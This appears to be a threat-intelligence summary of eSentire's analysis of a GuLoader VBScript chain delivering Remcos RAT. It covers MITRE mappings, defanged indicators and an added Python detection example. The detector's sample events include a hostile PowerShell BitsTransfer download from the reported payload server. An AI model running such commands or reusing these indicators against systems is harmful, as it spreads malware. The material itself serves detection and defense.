GuLoader VBScript Variant Returns with PowerShell Updates

GuLoader’s VBScript variant uses a tax-themed lure and a multi-stage PowerShell chain to load shellcode and drop Remcos RAT, all while staying largely in memory and evading analysis. The TRU team details the execution flow, from initial user action to payload retrieval, reflective shellcode loading, and C2 communications, and provides defenses and detection recommendations.

Key Points

  • The GuLoader VBScript variant is triggered when a user clicks a malicious shortcut file, which launches PowerShell and retrieves a decoy document and a VBScript payload.
  • The VBScript file (Tefor.vbs) is highly obfuscated and concatenates many strings to build a PowerShell command, hindering analysis.
  • The PowerShell chain downloads a payload package via BitsTransfer containing the second-stage PowerShell and two shellcode buffers.
  • Shellcode A and B are loaded reflectively in memory, with Shellcode B responsible for fetching and injecting Remcos RAT into a legitimate Windows process (ieinstal.exe).
  • Remcos C2 communications are observed with zazuservr[.]com over port 9019, indicating a remote control channel for the payload.
  • eSentire’s TRU team emphasizes layered detection, phishing awareness training, and endpoint hardening to mitigate GuLoader campaigns.
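The execution chain above gives a defender four observable pivots: a script host (wscript.exe/cscript.exe) spawning PowerShell, a PowerShell command line invoking BitsTransfer, PowerShell spawning ieinstal.exe, and ieinstal.exe connecting outbound on port 9019. The following is an added example, not code from eSentire or the original post: it runs those four checks over constructed process-creation and network events in a simple pipe-delimited layout (an assumption for this example, not any real telemetry format) and returns the rule names that fire.

```python
# Constructed sample events: kind|image|parent_image|command_line|destination.
# The field layout is an assumption for this example; map your own EDR/Sysmon
# fields onto it. Indicators (Tefor.vbs, the payload URL, zazuservr[.]com:9019)
# are the ones reported for this campaign, written defanged.
SAMPLE_EVENTS = r"""
proc|C:\Windows\System32\wscript.exe|C:\Windows\explorer.exe|wscript.exe C:\Users\u\Downloads\Tefor.vbs|
proc|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|C:\Windows\System32\wscript.exe|powershell -w hidden Import-Module BitsTransfer;Start-BitsTransfer -Source hxxp://194.55.224[.]183/frsh/Remimicra.hhp -Destination $env:APPDATA\p.bin|
proc|C:\Program Files\Internet Explorer\ieinstal.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|ieinstal.exe|
net|C:\Program Files\Internet Explorer\ieinstal.exe|||zazuservr[.]com:9019
proc|C:\Windows\System32\notepad.exe|C:\Windows\explorer.exe|notepad.exe|
"""

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")


def basename(path):
    """Lower-cased file name of a Windows path ('' stays '')."""
    return path.rsplit("\\", 1)[-1].lower()


def parse(text):
    """Turn the pipe-delimited sample into a list of event dicts."""
    events = []
    for line in text.strip().splitlines():
        kind, image, parent, cmdline, dest = line.split("|", 4)
        events.append({"kind": kind, "image": basename(image),
                       "parent": basename(parent), "cmdline": cmdline, "dest": dest})
    return events


def detect(events):
    """Apply the four chain-specific rules; return (rule_name, evidence) pairs."""
    findings = []
    for e in events:
        img, par, cmd = e["image"], e["parent"], e["cmdline"].lower()
        if e["kind"] == "proc":
            if img == "powershell.exe" and par in SCRIPT_HOSTS:
                findings.append(("script_host_spawns_powershell", e["cmdline"]))
            if img == "powershell.exe" and "bitstransfer" in cmd:
                findings.append(("powershell_bitstransfer_download", e["cmdline"]))
            if img == "ieinstal.exe" and par == "powershell.exe":
                findings.append(("powershell_spawns_ieinstal", e["cmdline"]))
        elif e["kind"] == "net" and img == "ieinstal.exe" and e["dest"].endswith(":9019"):
            findings.append(("ieinstal_outbound_9019", e["dest"]))
    return findings


def run():
    return detect(parse(SAMPLE_EVENTS))
```

Each rule is noisy on its own (BitsTransfer has legitimate admin uses); the value is in correlating them by process lineage and time window, which is what layered detection means here.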

MITRE Techniques

  • [T1059.001] PowerShell – The chain begins with a shortcut-triggered PowerShell execution that retrieves a decoy document and a VBS script. “Similar to the previous activity, GuLoader execution begins with the user clicking on a shortcut file and launching a PowerShell command, which retrieves a decoy tax document and VBS script.”
  • [T1059.005] VBScript – The Tefor.vbs file is highly obfuscated and builds a PowerShell command from hundreds of strings. “Like GuLoader VBScript variants in the past, this is highly obfuscated and contains junk code to impede analysis. The script concatenates hundreds of smaller strings into a single variable which ultimately builds and executes a PowerShell command.”
  • [T1105] Ingress Tool Transfer – BitsTransfer retrieves a payload package containing the second-stage PowerShell and two shellcode buffers. “BitsTransfer is used to retrieve a payload package containing the second stage PowerShell and two shellcode buffers.”
  • [T1055.012] Reflective Code Loading – Shellcode A and Shellcode B are reflectively loaded from the payload package. “Shellcode A is carved from the package and reflectively loaded. Shellcode B is decoded by Shellcode A and reflectively loaded.”
  • [T1055] Process Injection – Shellcode B injects Remcos RAT into a legitimate Windows process (ieinstal.exe). “Shellcode B is used to retrieve and inject Remcos RAT into a legitimate Windows process such as ieinstall.exe.”
  • [T1071.001] Web Protocols – Remcos RAT communicates to a remote C2 domain (zazuservr[.]com) over a port (9019). “Remcos RAT identified in this case communicates to zazuservr[.]com over port 9019.”
  • [T1027] Obfuscated/Compressed Files and Information – De-obfuscation routines are used to hide payloads and commands. “The PowerShell command contains various obfuscated strings… The final section contains the second stage PowerShell code:”

Indicators of Compromise

  • [File Hash] GuLoader/Remcos artifacts – f39329106b591529cc1d7e82f4cfbfa6, f6489874716c1684221548d18631e3a9, and 4 more hashes
  • [URL] Payload downloads – hxxp://194.55.224[.]183/frsh/Remimicra.hhp, hxxp://194.55.224[.]183/frsh/iFaeETTILhlw208.bin
  • [Domain] Command and control – zazuservr[.]com
  • [File Name] VBScript payload – Tefor.vbs

Read more: https://www.esentire.com/blog/guloader-vbscript-variant-returns-with-powershell-updates